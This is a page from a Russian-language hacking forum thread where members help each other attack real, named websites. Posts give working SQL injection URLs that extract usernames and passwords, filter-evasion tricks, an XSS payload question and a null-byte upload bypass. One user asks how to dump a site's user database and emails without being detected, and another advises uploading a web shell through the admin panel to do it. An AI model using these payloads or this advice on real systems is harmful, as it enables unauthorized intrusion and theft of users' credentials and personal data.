Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Все зависит от грамотности фильтра... Поиграйся с регистром и тд... Если ничего не получится - крути как блинд.
     
    1 person likes this.
  2. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    mailbrush - так и быть понтанусь
    LokbatanLi - )))ya toze pisy translitom
    Code:
    http://www.section404.org/news.php?id=1/**/and/**/1=0%20/**/union/**/all/**/select/**/0,0,0,concat_ws%280x3a,username,password%29,0,0/**/from/**/config--
     
    1 person likes this.
  3. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    с регистром не прокатывает..
     
  4. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    M1ks мне в лс ссылку если не трудно:(
     
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    При наличии слова он его вырезает, или редирект, etc ?
     
  6. Radiator

    Radiator Active Member

    Joined:
    17 Mar 2009
    Messages:
    394
    Likes Received:
    143
    Reputations:
    24
    http://www.discount.ru/search.html?find=-1%27&search=%E8%F1%EA%E0%F2%FC

    нашел. Это sql-inj илил нет?

    если да,помогите раскопать дальше
     
  7. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    Code:
    http://www.discount.ru/search.html?find=1%27+and+1%3C0+or+version%28%29%3C4.1+and+version%28%29%3E3.9%2F*+&search=%E8%F1%EA%E0%F2%FC
    версия 4.0*
    полей 14, выводится 3е.
    Code:
    http://www.discount.ru/search.html?find=1%27+and+1%3C0+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C33%2C4%2F*&search=%E8%F1%EA%E0%F2%FC
    
    зы удаляйте пробелы в коде.
     
    #10687 geezer.code, 18 Dec 2009
    Last edited: 18 Dec 2009
    1 person likes this.
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    А ты сам попробуй раскрутить хоть какую-то скулю так... Не проканает, т.к. /**/ вместо пробела, и получится запрос
    Code:
    ...un ion ...
    И мускуль их интерпретирует как два разных оператора.
     
  9. Radiator

    Radiator Active Member

    Joined:
    17 Mar 2009
    Messages:
    394
    Likes Received:
    143
    Reputations:
    24
    таак.сппс. а дальше что делать?

    сорри,новичок в этом)
     
    1 person likes this.
  10. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Есть html код в которо можно менять 2 параметра одновлеменно это {xss}
    Вопрос: как составить приавильно {xss} чтобы её небыло видно
    Условие: html теги ружиться, пробовал регистр менять, не помогло
    Code:
    <a href="{xss}" target="_blank" class="name">{xss}</a>
    И ещё 1 вопрос
    Сервер на *nix
    Есть форма для залива картинок, пробовал заливать картинки с именами img.php0x00.gif или img.php%00.gif
    Но они так и сохраняются на сервере.
    Вопрос: как можно попробовать обрезать тип файла и запустить как php (может я не правильно null байт применил?)
     
    #10690 Byrger, 18 Dec 2009
    Last edited: 18 Dec 2009
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    никак
     
    1 person likes this.
  12. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Что дальше делать? Открыть статью по sql injection и прочитать. Гениально правда?
     
    1 person likes this.
  13. SnooPy

    SnooPy New Member

    Joined:
    16 Dec 2009
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    Здавствуйте помогите пожалуйста со скулой есть сайт выводит вот такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 5'
    я так понял тут нужно Limit использовать?
     
    #10693 SnooPy, 19 Dec 2009
    Last edited: 19 Dec 2009
  14. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    имею доступ в админку (root). Нужно слить оттуда всю бд юзеров и их мыльники. В админке, кроме как редактирования различных разделов,добавлений нвостей, опросов, ничего нет, типа dump database и т.д. Шелл? Но как чтобы не спалится?
    П.С. С шеллами дел почти не имел, поэтому, если этот метод в моем случае прокатит, то расскажите поподробнее)
     
  15. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    лей шелл через админку (если это возможно), смотри конфиг подключения к бд, с шелла подключаешься к бд, сливаешь что тебе нужно.
     
  16. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    как узнать возможно залить шелл или нет? В админке можно редактировать новости, а также есть система баннерной рекламы, где нужна ссылка на баннер, сам баннер, с моего компа( может быть именну тут и попробовать залить?) также можно выбрать с какого числа по которое показывать.
    Да, и как не спалится, если я сейчас через баннер залью шелл и как мне потом к шеллу коннектиться?))
     
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Методом научного тыка.
     
  18. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    ну например так:
    http://www.sendas.org.ec/contenido.php?idM=-1+union(select+1)--&idP=0&lan=1
    added
    http://www.sendas.org.ec
    /contenido.php?idM=-1+union(select+1,2,3,4,5,6,7,8,9,version%28%29,1,2)--&idP=0&lan=1
     
    #10698 geezer.code, 19 Dec 2009
    Last edited: 19 Dec 2009
    2 people like this.
  19. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    :D
    Code:
    http://www.sendas.org.ec/contenido.php?idM=%28-1%29union%28select%281%29,%282%29,%283%29,%284%29,%285%29,%286%29,%287%29,%288%29,%289%29,%28version%28%29%29,%281%29,%282%29%20%29--&idP=0&lan=1
    без мочилова мозга мон и так
    Code:
    http://www.sendas.org.ec/contenido.php?idM=-1+union+all+select+1,2,3,4,5,6,7,8,9,version%28%29,11,12&idP=0&lan=1
     
    #10699 [x60]unu, 19 Dec 2009
    Last edited: 19 Dec 2009
    1 person likes this.
  20. Radiator

    Radiator Active Member

    Joined:
    17 Mar 2009
    Messages:
    394
    Likes Received:
    143
    Reputations:
    24
    http://www.discount.ru/search.html?find=1%27+and+1%3C0+union+select+1%2C2 %2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C33%2C4% 2F*&search=%E8%F1%EA%E0%F2%FC

    что дальше? что-то застрял..
     
Thread Status:
Not open for further replies.